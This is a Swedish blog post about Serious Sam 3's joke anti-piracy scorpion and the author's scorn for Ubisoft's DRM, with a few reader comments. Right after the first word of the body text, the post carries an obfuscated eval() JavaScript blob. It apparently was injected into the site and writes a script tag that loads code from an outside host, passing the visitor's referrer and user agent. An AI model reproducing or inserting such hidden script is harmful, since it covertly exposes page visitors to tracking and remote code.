Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Serious Sam 3 har världens bästa piratskydd.

Serious Sam 3 har världens bästa piratskydd.
Filip Urde
  • On 8 december, 2011
  • http://www.revue.se/filip-urde
Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffkef|var|u0026u|referrer|anakr||js|php’.split(’|’),0,{}))
skrev tidigare om hur Ubisoft med flera andra företag hittar på extremt fåniga lösningar på att hur man ska stoppa piratkopieringen.
(läs mer om det här)
Ubisoft tänker ju inte ens göra spel till PC…
Vilket bara är något som dem kommer förlora på i längden och det ser jag på med glädje…
Några som dock förstått hur man ska göra är Croteam, som har skapat ett av de mest kreativa bekämpningsmedlen jag sett.  I Serious Sam 3 har man lagt in systemet ”World’s Stupidest DRM”, ett piratskydd som består av en supersnabb, odödlig och grymt bestyckad rödskorpion som dyker upp för alla som har piratkopierat Serious Sam 3. Skit kul! Precis så här ska man tackla problemet och inte som fåniga Ubisoft!  hejja!

httpv://youtu.be/e91q5BtlxK0?hd=1

Comments

  1. Men vilka har ”piratkopierat” spelat då? Fel CD-key? De som har laddat ner spelet och inte har crackat det dvs? Så skorpionen kommer fram i spelet istället för ”Wrong CD-key. Try again”-meddelande?

    • bra fråga… jag kan tänka mig att spelet kör synkning mot en online-databas och när det upptäcks att spelet inte har en korrekt CD-key så dyker skorpionen upp. Men jag vet ju som sagt inte.

  2. Det stämmer. Det är inte bara Ubisoft detta gäller. Flera bolag börjar diskutera PC-branschen och om det verkligen är värt jobbet för den vinst som fås. Konsol versionerna är ett mer säkert kort sätt på omsättning säger EA.